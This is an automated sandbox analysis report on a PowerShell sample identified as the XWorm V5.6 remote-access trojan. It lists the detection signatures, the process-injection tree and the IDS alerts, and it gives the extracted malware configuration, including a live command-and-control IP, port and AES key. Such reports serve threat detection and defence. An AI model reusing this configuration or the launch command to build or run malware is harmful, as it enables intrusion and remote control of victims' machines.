Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mhqxUdpe7V.ps1

Overview

General Information

Sample name:mhqxUdpe7V.ps1
renamed because original name is a hash value
Original sample name:372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e.ps1
Analysis ID:1577168
MD5:d8e887ed6c14e9b9279b739aea8bb613
SHA1:d5d2ade0c4896b1e7fc6318ec97dbb49ee1cb071
SHA256:372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e
Tags:92-255-57-155ps1user-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 1820 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 3352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xaa5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xaaf9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xac0e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xa81e:$cnc4: POST / HTTP/1.1
    00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x55a9c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x55b39:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x55c4e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x5585e:$cnc4: POST / HTTP/1.1
      00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.powershell.exe.1ac16030578.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.powershell.exe.1ac16e49e40.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.powershell.exe.1ac16030578.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x8e5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x8ef9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x900e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x8c1e:$cnc4: POST / HTTP/1.1
            0.2.powershell.exe.1ac16e49e40.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x8e5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x8ef9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x900e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x8c1e:$cnc4: POST / HTTP/1.1
            4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 5 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", ProcessId: 3600, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", ProcessId: 3600, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T08:15:44.383553+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:15:55.993778+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:15:58.442744+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:07.619210+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:19.244265+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:28.596948+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:30.869806+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:35.540659+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:35.775609+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:35.966382+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:37.275818+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:47.024809+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:51.681721+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:51.872600+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:55.860763+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:16:58.870117+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:02.360638+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:07.338323+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:07.529526+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:07.798850+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:19.369699+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:28.636169+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:28.826358+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:30.009802+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:30.200715+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:30.366726+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:30.392547+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:30.683445+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:38.088186+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:41.526413+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:45.623108+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:57.260857+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:17:58.430043+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:08.930832+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:12.401150+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:12.591925+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:12.713869+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:15.259849+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:18.994275+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:23.072270+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:28.444810+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:34.833814+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:36.479150+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:37.871432+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:45.510717+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:57.135572+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:18:58.456985+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:19:08.793859+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:19:17.112172+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:19:21.167141+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:19:28.446368+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              2024-12-18T08:19:30.432749+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T08:15:44.423184+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:15:55.995603+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:16:07.622697+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:16:19.246948+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:16:30.871894+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:16:35.586657+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:16:35.777466+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:16:35.971330+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:16:37.278095+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:16:47.027279+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:16:51.687517+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:16:51.874949+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:16:55.863013+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:02.363894+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:07.430548+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:07.550481+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:07.804066+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:19.371972+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:28.828701+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:30.202778+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:30.371295+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:30.491088+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:30.778035+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:38.091676+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:41.528389+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:45.634389+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:17:57.263162+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:08.932951+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:12.403176+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:12.594444+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:12.715630+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:15.262040+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:18.999823+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:23.074203+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:34.838093+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:36.481824+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:37.874173+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:45.514127+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:18:57.141141+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:19:08.800193+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:19:17.253400+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:19:21.168994+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              2024-12-18T08:19:30.433858+010028529231Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T08:15:58.442744+010028588011Malware Command and Control Activity Detected92.255.57.1554411192.168.2.949705TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T08:18:22.639364+010028587991Malware Command and Control Activity Detected192.168.2.94970592.255.57.1554411TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              Multi AV Scanner detection for submitted file
              Source: mhqxUdpe7V.ps1Virustotal: Detection: 9%Perma Link
              Source: mhqxUdpe7V.ps1ReversingLabs: Detection: 13%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Sample uses string decryption to hide its real strings
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpackString decryptor: 92.255.57.155
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpackString decryptor: 4411
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpackString decryptor: P0WER
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpackString decryptor: <Xwormmm>
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpackString decryptor: XWorm V5.6
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpackString decryptor: USB.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49705 -> 92.255.57.155:4411
              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.155:4411 -> 192.168.2.9:49705
              Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.9:49705 -> 92.255.57.155:4411
              Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.155:4411 -> 192.168.2.9:49705
              Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49705 -> 92.255.57.155:4411
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 92.255.57.155
              Source: global trafficTCP traffic: 192.168.2.9:49705 -> 92.255.57.155:4411
              Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
              Source: powershell.exe, 00000000.00000002.1504821903.000001AC25E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000000.00000002.1483546758.000001AC15C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3916503959.0000000003101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000000.00000002.1483546758.000001AC15C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000000.00000002.1483546758.000001AC163FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000000.00000002.1504821903.000001AC25E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.powershell.exe.1ac16030578.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.1ac16e49e40.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
